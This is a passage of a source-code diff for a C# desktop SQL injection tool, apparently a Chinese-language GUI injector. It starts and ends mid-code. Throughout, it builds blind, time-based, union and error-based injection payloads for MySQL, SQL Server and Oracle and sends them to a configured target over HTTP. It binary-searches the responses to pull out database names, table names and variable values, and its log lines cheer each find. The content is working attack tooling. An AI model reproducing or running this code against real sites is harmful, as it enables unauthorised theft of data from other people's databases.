+ }
+
+ //取值payload,替换对应下标值
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ //多字节字符
+ if (pLen_isMax)
+ {
+ //MySQL采用hex
+ int mu_payload_len = getValue(plen, 2, 8);
+ int m_index = 0;
+ String[] ver_tmp = new String[mu_payload_len];
+ while (m_index < mu_payload_len)
+ {
+ //获取多字节
+ int ascii = getValue(tmp_va_payload, 0, 128);
+ ver_tmp[m_index] = ((char)ascii).ToString();
+ m_index++;
+ }
+ //设置值,这里由于是hex值,需要转换
+ value += Tools.unHex(Tools.convertToString(ver_tmp), config.db_encoding);
+ }
+ //单字节字符
+ else
+ {
+ int ascii = getValue(tmp_va_payload, 0, 255);
+ value += ((char)ascii).ToString();
+ }*/
+ String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ int ascii = getValue(tmp_va_payload, 0, 255);
+ value += ((char)ascii).ToString();
+ }
+ this.Invoke(new StringDelegate(log), vs[0] + "值为-----:" + value);
+ this.Invoke(new setVariableDelegate(setVariable), vs[0], value);
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+
+ }
+
+
+ ///
+ /// 获取环境变量sqlserver bool
+ ///
+ ///
+ public void getVariableByBoolBySQLServer(Object vers)
+ {
+ try
+ {
+ String[] vs = vers.ToString().Split(':');
+ //判断变量长度
+ int len = getValueByStepUp(MSSQL.bool_length.Replace("{data}", vs[1]), 0, 10);
+ this.Invoke(new StringDelegate(log), vs[0] + "长度为-----:" + len);
+
+ String va_payload = MSSQL.bool_value.Replace("{data}", vs[1]);
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+
+ //select UNICODE(substring(@@version,{index},1))
+ //取值payload,替换对应下标值
+ String unicode_data_payload = MSSQL.unicode_value.Replace("{index}", i + "").Replace("{data}", vs[1] + "");
+ //取unicode转换后的长度
+ String unicode_data_len_payload = MSSQL.bool_length.Replace("{data}", unicode_data_payload);
+
+ //长度范围2-8支持大部分语言
+ int unicode_data_len = getValue(unicode_data_len_payload, 1, 8);
+ int m_index = 1;
+ StringBuilder unicodes = new StringBuilder();
+ while (m_index <= unicode_data_len)
+ {
+ //获取多字节
+ String substr_payload = MSSQL.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString());
+ //单个unicode值范围是0-9
+ int unicode = getValue(MSSQL.bool_value.Replace("{data}", substr_payload), 0, 9);
+ unicodes.Append(unicode.ToString());
+ m_index++;
+ }
+
+ value += Tools.unHexByUnicode(int.Parse(unicodes.ToString()), config.db_encoding);
+ //设置值,这里由于是unicode值,需要转换
+ //String tmp_va_payload = va_payload.Replace("{index}", i + "");
+ //int ascii = getValue(tmp_va_payload, 0, 255);
+ }
+ this.Invoke(new StringDelegate(log), vs[0] + "值为-----:" + value);
+ this.Invoke(new setVariableDelegate(setVariable), vs[0], value);
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+
+ ///
+ /// 获取环境变量oracle bool
+ ///
+ ///
+ public void getVariableByBoolByOracle(Object vers)
+ {
+ try
+ {
+ String[] vs = vers.ToString().Split(':');
+ //判断变量长度
+ int len = getValueByStepUp(Oracle.bool_length.Replace("{data}", vs[1]), 0, 10);
+ this.Invoke(new StringDelegate(log), vs[0] + "长度为-----:" + len);
+
+ String va_payload = Oracle.bool_value.Replace("{data}", vs[1]);
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ String dp = va_payload.Replace("{index}", i.ToString());
+ int ascii = getValue(dp, 0, 255);
+ value += (char)ascii;
+ }
+ this.Invoke(new StringDelegate(log), vs[0] + "值为-----:" + value);
+ this.Invoke(new setVariableDelegate(setVariable), vs[0], value);
+
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ delegate void addItemToListViewDelegate(ListViewItem item);
+
+ public void addItemToListView(ListViewItem item)
+ {
+ this.data_dbs_lvw_data.Items.Add(item);
+ }
+
+ delegate void addItemToListViewByColumnsDelegate(String colvs);
+ public void addItemToListViewByColumns(String colvs)
+ {
+ String[] colv = Regex.Split(colvs, "\\$\\$\\$");
+ ListViewItem lvi = null;
+ for (int i = 0; i < colv.Length; i++)
+ {
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(colv[i]);
+ }
+ else
+ {
+
+ lvi.SubItems.Add(colv[i]);
+ }
+ }
+ this.data_dbs_lvw_data.Items.Add(lvi);
+ }
+
+ ///
+ /// 获取数据库名称
+ ///
+ /// 下标limit
+ public void getDBNameByBoolByMySQL(Object oindex)
+ {
+ try
+ {
+ int db_index = int.Parse(oindex.ToString());
+ //判断对应下标的数据库长度
+ String payload_len = MySQL5.ver_length.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString()));
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ payload_len = MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString())), config.maxTime);
+ }
+
+
+ //判断当前数据库长度限制1-50
+ int len = getValue(payload_len, 1, 50);
+ this.Invoke(new StringDelegate(log), "数据库" + (db_index + 1) + "长度为-----:" + len); + + //判断当前数据库对应的ascii码 + String va_payload = MySQL5.ver_value.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString())); + if (config.keyType.Equals(KeyType.Time)) + { + va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value.Replace("{data}", MySQL5.db_value.Replace("{index}", oindex.ToString())), config.maxTime); + } + String value = ""; + //获取值 + for (int i = 1; i <= len; i++) + { + if (status != 1) + { + break; + } + //取值payload,替换对应下标值 + String tmp_va_payload = va_payload.Replace("{index}", i + ""); + int ascii = getValue(tmp_va_payload, 0, 128); + value += ((char)ascii).ToString(); + } + this.Invoke(new StringDelegate(log), "数据库" + db_index + "的名称为:" + value); + this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), value); + + } + catch (Exception e) + { + + this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message); + } + } + + + /// + /// 获取数据库名称mssql + /// + /// 下标 + public void getDBNameByBoolBySQLServer(Object oindex) + { + try + { + int db_index = int.Parse(oindex.ToString()); + //判断对应下标的数据库长度 + String data_payload = MSSQL.db_value.Replace("{index}", db_index.ToString()); + int len = getValueByStepUp(MSSQL.bool_length.Replace("{data}", data_payload), 0, 10); + + this.Invoke(new StringDelegate(log), "数据库" + db_index + "长度为-----:" + len); + + //判断当前数据库对应的ascii码 + String va_payload = MSSQL.bool_value.Replace("{data}", MSSQL.db_value.Replace("{index}", oindex.ToString())); + String value = ""; + //获取值 + for (int i = 1; i <= len; i++) + { + if (status != 1) + { + break; + } + //取值payload,替换对应下标值 + //select UNICODE(substring(@@version,{index},1)) + //取值payload,替换对应下标值 + String unicode_data_payload = MSSQL.unicode_value.Replace("{index}", i + "").Replace("{data}", data_payload); + //取unicode转换后的长度 + String unicode_data_len_payload = MSSQL.bool_length.Replace("{data}", unicode_data_payload); + + //长度范围2-8支持大部分语言 + int unicode_data_len = 
getValue(unicode_data_len_payload, 1, 8); + int m_index = 1; + StringBuilder unicodes = new StringBuilder(); + while (m_index <= unicode_data_len && status == 1) + { + //获取多字节 + String substr_payload = MSSQL.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString()); + //单个unicode值范围是0-9 + int unicode = getValue(MSSQL.bool_value.Replace("{data}", substr_payload), 0, 9); + unicodes.Append(unicode.ToString()); + m_index++; + } + + if (Tools.convertToInt(unicodes.ToString()) > 255) + { + value += Tools.unHexByUnicode(int.Parse(unicodes.ToString()), config.db_encoding); + } + else + { + value += (char)Tools.convertToInt(unicodes.ToString()); + } + } + this.Invoke(new StringDelegate(log), "数据库" + db_index + "的名称为:" + value); + this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), value); + + } + catch (Exception e) + { + + this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message); + } + } + + /// + /// 获取数据库名称 + /// + /// 下标limit + public void getDBNameByBoolByOracle(Object oindex) + { + try + { + int db_index = int.Parse(oindex.ToString()); + //判断对应下标的数据库长度 + String payload_len = Oracle.bool_length.Replace("{data}", Oracle.db_value.Replace("{index}", oindex.ToString())); + + //判断当前数据库长度限制1-50 + int len = getValue(payload_len, 1, 50); + this.Invoke(new StringDelegate(log), "数据库" + (db_index + 1) + "长度为-----:" + len); + + //判断当前数据库对应的ascii码 + String va_payload = Oracle.bool_value.Replace("{data}", Oracle.db_value.Replace("{index}", oindex.ToString())); + String value = ""; + //获取值 + for (int i = 1; i <= len; i++) + { + if (status != 1) + { + break; + } + //取值payload,替换对应下标值 + String tmp_va_payload = va_payload.Replace("{index}", i + ""); + int ascii = getValue(tmp_va_payload, 0, 128); + value += ((char)ascii).ToString(); + } + this.Invoke(new StringDelegate(log), "数据库" + db_index + "的名称为:" + value); + this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), value); + + } + catch (Exception e) + { + + this.Invoke(new 
StringDelegate(log), "获取数据库名称时发生异常:" + e.Message); + } + } + + + /// + /// 获取数据库名称Union方式MySQL + /// + /// 下标limit + public void getDBNameByUnionByMySQL(Object oindex) + { + try + { + //获取数据库数量 + List data_list = new List(); + data_list.Add(MySQL5.db_value.Replace("{index}", oindex.ToString())); + String db_Name_data = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", db_Name_data)); + this.Invoke(new StringDelegate(log), "数据库" + oindex + "的名称为:" + result); + this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result); + } + catch (Exception e) + { + + this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message); + } + } + + /// + /// 获取数据库名称Union方式SQLServer + /// + /// 下标limit + public void getDBNameByUnionBySQLServer(Object oindex) + { + try + { + //获取数据库数量 + String result = getOneDataByUnionOrError(MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.db_value, "", "", oindex.ToString())); + this.Invoke(new StringDelegate(log), "数据库" + oindex + "的名称为:" + result); + this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result); + } + catch (Exception e) + { + + this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message); + } + } + + /// + /// 获取数据库名称Union方式Oracle + /// + /// 下标limit + public void getDBNameByUnionByOracle(Object oindex) + { + try + { + //获取数据库数量 + String result = getOneDataByUnionOrError(Oracle.getUnionDataValue(config.columnsCount, config.showColumn, Oracle.db_value, "", "", oindex.ToString())); + this.Invoke(new StringDelegate(log), "数据库" + oindex + "的名称为:" + result); + this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result); + } + catch (Exception e) + { + + this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message); + } + } + + + /// + /// 获取数据库名称Error方式mysql + /// + /// 下标limit + public void getDBNameByErrorByMySQL(Object oindex) + { + try + { + List 
data_list = new List(); + data_list.Add(MySQL5.db_value.Replace("{index}", oindex.ToString())); + String db_Name_data = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", db_Name_data)); + this.Invoke(new StringDelegate(log), "数据库" + oindex + "的名称为:" + result); + this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result); + } + catch (Exception e) + { + + this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message); + } + } + + /// + /// 获取数据库名称Error方式mysql + /// + /// 下标limit + public void getDBNameByErrorBySQLServer(Object oindex) + { + try + { + String result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.db_value.Replace("{index}", oindex.ToString()))); + //HTML解码 + result = HttpUtility.HtmlDecode(result); + this.Invoke(new StringDelegate(log), "数据库" + oindex + "的名称为:" + result); + this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result); + } + catch (Exception e) + { + + this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message); + } + } + + /// + /// 获取数据库名称Error方式oracle + /// + /// 下标limit + public void getDBNameByErrorByOracle(Object oindex) + { + try + { + String result = getOneHexDataByUnionOrError(Oracle.getErrorDataValue(Oracle.db_value, "", "", oindex.ToString())); + //HTML解码 + result = HttpUtility.HtmlDecode(result); + this.Invoke(new StringDelegate(log), "数据库" + oindex + "的名称为:" + result); + this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result); + } + catch (Exception e) + { + + this.Invoke(new StringDelegate(log), "获取数据库名称时发生异常:" + e.Message); + } + } + + + + /// + /// bool方式获取mysql表 + /// + /// + public void getTableNameValueByBoolByMySQL(Object osn) + { + + try + { + SelectNode sn = (SelectNode)osn; + int selectIndex = sn.tn.Index; + //判断当前表长度 + String data_payload = MySQL5.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit + ""); + int len = 0; + if 
(config.keyType.Equals(KeyType.Time)) + { + len = getValue(MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", data_payload), config.maxTime), 1, 50); + } + else + { + len = getValue(MySQL5.ver_length.Replace("{data}", data_payload), 1, 50); + } + + + //判断当前数据库对应的ascii码 + String va_payload = MySQL5.ver_value.Replace("{data}", data_payload); + if (config.keyType.Equals(KeyType.Time)) + { + va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value, config.maxTime).Replace("{data}", data_payload); + } + + String value = ""; + //获取值 + for (int i = 1; i <= len; i++) + { + //取值payload,替换对应下标值 + String tmp_va_payload = va_payload.Replace("{index}", i + ""); + int ascii = getValue(tmp_va_payload, 0, 128); + value += ((char)ascii).ToString(); + } + this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + value); + this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, value, "table"); + + } + catch (Exception e) + { + + this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message); + } + } + + /// + /// bool方式获取oracle表 + /// + /// + public void getTableNameValueByBoolByOracle(Object osn) + { + + try + { + SelectNode sn = (SelectNode)osn; + int selectIndex = sn.tn.Index; + //判断当前表长度 + String data_payload = Oracle.table_value.Replace("{dbname}", sn.dbname).Replace("{index}", sn.limit + ""); + int len = getValue(Oracle.bool_length.Replace("{data}", data_payload), 1, 50); + + //判断当前数据库对应的ascii码 + String va_payload = Oracle.bool_value.Replace("{data}", data_payload); + String value = ""; + //获取值 + for (int i = 1; i <= len; i++) + { + //取值payload,替换对应下标值 + String tmp_va_payload = va_payload.Replace("{index}", i + ""); + int ascii = getValue(tmp_va_payload, 0, 128); + value += ((char)ascii).ToString(); + } + this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + value); + this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, value, "table"); + + } + catch (Exception e) + { + + this.Invoke(new StringDelegate(log), 
"获取值发生异常:" + e.Message); + } + } + + + public void getTableNameValueByBoolBySQLServer(Object osn) + { + + try + { + SelectNode sn = (SelectNode)osn; + //判断当前表长度 + String data_payload = MSSQL.table_value.Replace("{index}", sn.limit.ToString()).Replace("{dbname}", sn.dbname); + int len = getValueByStepUp(MSSQL.bool_length.Replace("{data}", data_payload), 0, 10); + String value = ""; + //获取值 + for (int i = 1; i <= len; i++) + { + //取值payload,替换对应下标值 + //select UNICODE(substring(@@version,{index},1)) + //取值payload,替换对应下标值 + String unicode_data_payload = MSSQL.unicode_value.Replace("{index}", i + "").Replace("{data}", data_payload); + //取unicode转换后的长度 + String unicode_data_len_payload = MSSQL.bool_length.Replace("{data}", unicode_data_payload); + + //长度范围2-8支持大部分语言 + int unicode_data_len = getValue(unicode_data_len_payload, 1, 8); + int m_index = 1; + StringBuilder unicodes = new StringBuilder(); + while (m_index <= unicode_data_len) + { + //获取多字节 + String substr_payload = MSSQL.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString()); + //单个unicode值范围是0-9 + int unicode = getValue(MSSQL.bool_value.Replace("{data}", substr_payload), 0, 9); + unicodes.Append(unicode.ToString()); + m_index++; + } + + if (Tools.convertToInt(unicodes.ToString()) > 255) + { + value += Tools.unHexByUnicode(int.Parse(unicodes.ToString()), config.db_encoding); + } + else + { + value += (char)Tools.convertToInt(unicodes.ToString()); + } + } + this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + value); + this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, value, "table"); + + } + catch (Exception e) + { + + this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message); + } + } + + + + /// + /// 获取表名,多线程调用mysql + /// + /// + public void getTableNameValueByUnionByMySQL(Object osn) + { + + SelectNode sn = (SelectNode)osn; + List data_list = new List(); + data_list.Add(MySQL5.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, 
"UTF-8")).Replace("{index}", sn.limit.ToString())); + String tables_value_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", tables_value_payload)); + + this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + result); + this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table"); + } + /// + /// 获取表名,多线程调用sqlserver + /// + /// + public void getTableNameValueByUnionBySQLServer(Object osn) + { + + SelectNode sn = (SelectNode)osn; + String tables_value_payload = MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.table_value, sn.dbname, sn.tableName, sn.limit.ToString()); + String result = getOneDataByUnionOrError(tables_value_payload); + + this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + result); + this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table"); + } + + /// + /// 获取表名,多线程调用sqlserver + /// + /// + public void getTableNameValueByUnionByOracle(Object osn) + { + + SelectNode sn = (SelectNode)osn; + String tables_value_payload = Oracle.getUnionDataValue(config.columnsCount, config.showColumn, Oracle.table_value, sn.dbname, "", sn.limit.ToString()); + String result = getOneDataByUnionOrError(tables_value_payload); + + this.Invoke(new StringDelegate(log), "用户" + sn.dbname + "发现表:" + result); + this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table"); + } + + public void getTableNameValueByErrorByMySQL(Object osn) + { + + SelectNode sn = (SelectNode)osn; + List data_list = new List(); + data_list.Add(MySQL5.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit.ToString())); + String table_value_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", 
table_value_payload));
+
+ this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table");
+ }
+
+ public void getTableNameValueByErrorBySQLServer(Object osn)
+ {
+
+ SelectNode sn = (SelectNode)osn;
+ List data_list = new List();
+ String result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.table_value.Replace("{dbname}", sn.dbname).Replace("{index}", sn.limit.ToString())));
+
+ this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table");
+ }
+
+ public void getTableNameValueByErrorByOracle(Object osn)
+ {
+
+ SelectNode sn = (SelectNode)osn;
+ List data_list = new List();
+ String result = getOneHexDataByUnionOrError(Oracle.getErrorDataValue(Oracle.table_value, sn.dbname, "", sn.limit.ToString()));
+
+ this.Invoke(new StringDelegate(log), "数据库" + sn.dbname + "发现表:" + result);
+ this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table");
+ }
+
+
+ delegate void addNodeToTreeListDelegate(TreeNode tn, String text, String type);
+
+ public void addNodeToTreeList(TreeNode tn, String text, String type)
+ {
+ TreeNode stn = new TreeNode(text);
+ stn.Tag = type;
+ if ("dbs".Equals(type))
+ {
+ stn.ImageIndex = 4;
+ }
+ else if ("table".Equals(type))
+ {
+ stn.ImageIndex = 1;
+ }
+ else if ("column".Equals(type))
+ {
+ stn.ImageIndex = 2;
+ }
+ tn.Nodes.Add(stn);
+ tn.Expand();
+ }
+
+
+ ///
+ /// 二分法判断
+ ///
+ /// 获取数据paylaod
+ /// 开始值
+ /// 最大值
+ ///
+ public int getValue(String payLoadStr, int start, int end)
+ {
+ int len = 0;
+ String payload = "";
+ int min = start;
+ int olen = 0;
+ while (status == 1)
+ {
+ //2分法获取中间数字
+ len = Tools.getLargeNum(start, end);
+ if (olen == len)
+ {
+ len = end;
+ break;
+ }
+ olen = len;
+ payload = payLoadStr.Replace("{len}", len + "");
+ ServerInfo server =
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ Boolean exists = Tools.isTrue(server, config.key, config.reverseKey, config.keyType);
+ if (exists)
+ {
+ if (len == start)
+ {
+ return end;
+ }
+ start = len;
+ }
+ else
+ {
+ if (len == start)
+ {
+ return len;
+ }
+ end = len;
+ }
+ }
+ return len;
+
+ }
+
+ delegate void addDBToTreeListDelegate(String dbName);
+ public void addDBToTreeList(String dbName)
+ {
+
+ TreeNode tn = new TreeNode(dbName);
+ tn.Tag = "dbs";
+ this.data_tvw_dbs.Nodes.Add(tn);
+
+ }
+
+
+ ///
+ /// 递增获取值
+ ///
+ /// 获取数据paylaod
+ /// 开始值
+ /// 最大值
+ ///
+ public int getValueByStepUp(String payLoadStr, int start, int step)
+ {
+ int len = 0;
+ int starts = start;
+ String payload = "";
+ while (status == 1)
+ {
+ payload = payLoadStr.Replace("{len}", start + "");
+ ServerInfo server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ if (Tools.isTrue(server, config.key, config.reverseKey, config.keyType))
+ {
+ start += step;
+ }
+ else
+ {
+
+ //确定范围了
+ int s = start - step;
+ if (start <= 0)
+ {
+ break;
+ }
+ else
+ {
+ len = getValue(payLoadStr, s, start);
+ break;
+ }
+ }
+ }
+ return len;
+ }
+
+ public delegate void sendHTTPLogDelegate(String index, ServerInfo server, String payload);
+
+ public void sendHTTPLog(String index, ServerInfo server, String payload)
+ {
+ ListViewItem lvi = new ListViewItem(index);
+ lvi.Tag = index;
+ lvi.SubItems.Add(payload);
+ lvi.SubItems.Add(server.runTime + "");
+ lvi.SubItems.Add(server.code + "");
+ lvi.SubItems.Add(server.length + "");
+ lvi.SubItems.Add(server.sleepTime.ToString());
+ this.log_lvw_httpLog.Items.Add(lvi);
+ }
+
+
+ public Boolean findKeyInBody(String payLoadStr, int num)
+ {
+
+ String payload =
payLoadStr.Replace("{len}", num + ""); ;
+ while (status == 1)
+ {
+ ServerInfo server = null;
+ int tryCount = 0;
+ while (tryCount <= config.reTry)
+ {
+ try
+ {
+ server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ break;
+ }
+ catch (Exception e)
+ {
+ tryCount++;
+ this.Invoke(new StringDelegate(log), "发包失败!异常:" + e.Message);
+ }
+ }
+ if (server == null)
+ {
+ return false;
+ }
+
+ return Tools.isTrue(server, config.key, config.reverseKey, config.keyType);
+
+ }
+ return false;
+
+ }
+
+ public Boolean findKeyInBody(String payLoadStr)
+ {
+ while (true)
+ {
+ ServerInfo server = null;
+ int tryCount = 0;
+ while (tryCount <= config.reTry)
+ {
+ try
+ {
+ server = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payLoadStr, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
+ break;
+ }
+ catch (Exception e)
+ {
+ tryCount++;
+ this.Invoke(new StringDelegate(log), "发包失败!异常:" + e.Message);
+ }
+ }
+ if (server == null)
+ {
+ return false;
+ }
+
+ return Tools.isTrue(server, config.key, config.reverseKey, config.keyType);
+
+ }
+
+ }
+
+ public delegate void StringDelegate(String str);
+ public void log(String log)
+ {
+ if (config.isOpenInfoLog)
+ {
+ if (this.txt_log.Left > 10000)
+ {
+ this.txt_log.Text = "";
+ }
+ this.txt_log.AppendText(@log + "----" + DateTime.Now + "\r\n"+FileTool.error);
+ }
+ }
+
+ public Boolean isSetInjectPoint()
+ {
+
+ if (this.txt_inject_request.Text.IndexOf(setInjectStr) == -1)
+ {
+ MessageBox.Show("未设置注入点!");
+ return false;
+ }
+ else
+ {
+ return true;
+ }
+
+ }
+
+
+ private void btn_inject_setInject_Click(object sender, EventArgs e)
+ {
+ this.txt_inject_request.Text = this.txt_inject_request.Text.Insert(this.txt_inject_request.SelectionStart, setInjectStr);
+ }
+
+ private void
btn_inject_setEncodingRange_Click(object sender, EventArgs e)
+ {
+
+ this.txt_inject_request.SelectedText = "" + this.txt_inject_request.SelectedText + "";
+ }
+
+ AddNode an = null;
+
+ private void data_dbs_tsmi_deleteNode_Click(object sender, EventArgs e)
+ {
+ if (this.data_tvw_dbs.SelectedNode != null)
+ {
+
+ this.data_tvw_dbs.SelectedNode.Remove();
+ }
+ }
+ public void getDBSByError(DBType dbType)
+ {
+ //获取数据库数量
+ List data_list = new List();
+ String db_Count_data = "";
+ String result = "";
+ int db_len = 0;
+ switch (dbType)
+ {
+ case DBType.Access:
+ MessageBox.Show("抱歉Access数据库,不支持错误显示注入!");
+ break;
+ case DBType.MySQL4:
+ MessageBox.Show("抱歉MySQL4数据库,不支持错误显示注入!");
+ break;
+ case DBType.MySQL5:
+
+ data_list.Add(MySQL5.dbs_count);
+ db_Count_data = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", db_Count_data));
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + result + "个数据库!");
+ db_len = Tools.convertToInt(result);
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ for (int j = 0; j < db_len; j++)
+ {
+ //获取对应的数据库
+
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByErrorByMySQL), j);
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ case DBType.SQLServer:
+ //获取数据库数量
+ result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.dbs_count));
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + result + "个数据库!");
+ db_len = Tools.convertToInt(result);
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ //注意这里db_name()下标从1开始
+ for (int j = 1; j <= db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByErrorBySQLServer), j);
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ case DBType.Oracle:
+ //获取数据库数量
+ result = getOneHexDataByUnionOrError(Oracle.getErrorDataValue(Oracle.dbs_count, "", "", ""));
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了"
+ result + "个数据库用户!");
+ db_len = Tools.convertToInt(result);
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ //下标从1开始
+ for (int j = 1; j <= db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByErrorByOracle), j);
+ }
+
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ }
+
+ }
+ public void getDBSByUnion(DBType dbType)
+ {
+ List data_list = new List();
+ String db_Count_data = "";
+ String result = "";
+ int db_len = 0;
+ switch (dbType)
+ {
+ case DBType.Access:
+ break;
+ case DBType.MySQL4:
+ break;
+ case DBType.MySQL5:
+ //获取数据库数量
+ data_list.Add(MySQL5.dbs_count);
+ db_Count_data = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", db_Count_data));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + result + "个数据库!");
+ db_len = Tools.convertToInt(result);
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ for (int j = 0; j < db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByUnionByMySQL), j);
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ case DBType.SQLServer:
+ //获取数据库数量
+ result = getOneDataByUnionOrError(MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, MSSQL.dbs_count));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + result + "个数据库!");
+ db_len = Tools.convertToInt(result);
+ this.dbsCount = db_len;
+ if (db_len > 0)
+ {
+ for (int j = 1; j <= db_len; j++)
+ {
+ //获取对应的数据库
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDBNameByUnionBySQLServer), j);
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有发现数据库,奇怪了!");
+ }
+ break;
+ case DBType.Oracle:
+ //获取数据库数量
+ result = getOneDataByUnionOrError(Oracle.getUnionDataValue(config.columnsCount, config.showColumn, Oracle.dbs_count, "", "", ""));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,我发现了" + result + "个数据库用户!");
+
